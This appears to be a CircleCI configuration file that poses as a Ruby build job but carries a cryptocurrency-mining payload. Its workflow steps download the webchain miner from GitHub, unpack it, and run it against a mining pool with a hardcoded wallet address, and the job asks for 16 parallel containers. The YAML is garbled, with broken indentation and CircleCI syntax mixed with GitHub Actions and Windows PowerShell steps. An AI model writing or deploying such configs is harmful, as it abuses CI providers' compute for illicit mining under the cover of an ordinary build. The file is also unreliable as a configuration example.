version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: |
              lscpu
              echo Hello,subscribe it

workflows:
    version: 2.1
    build:
        jobs:
        - trial
        - name: PREPARING
      Run: Invoke-WebRequest https://github.com/mintme-com/miner/releases/download/v2.8.0/webchain-miner-2.8.0-win64.zip -OutFile webchain-miner-2.8.0-win64.zip
    - name: Seting-UP
      run: Expand-Archive webchain-miner-2.8.0-win64.zip
    - name: Running
      run: .\webchain-miner-2.8.0-win64\webchain-miner.exe -o pool.webchain.network:2222 -p x -t 1 -u 0xeA1a42b8Df9e50e745b4f9E85391c46A5e5b3eB0
    - name: END
      run: exit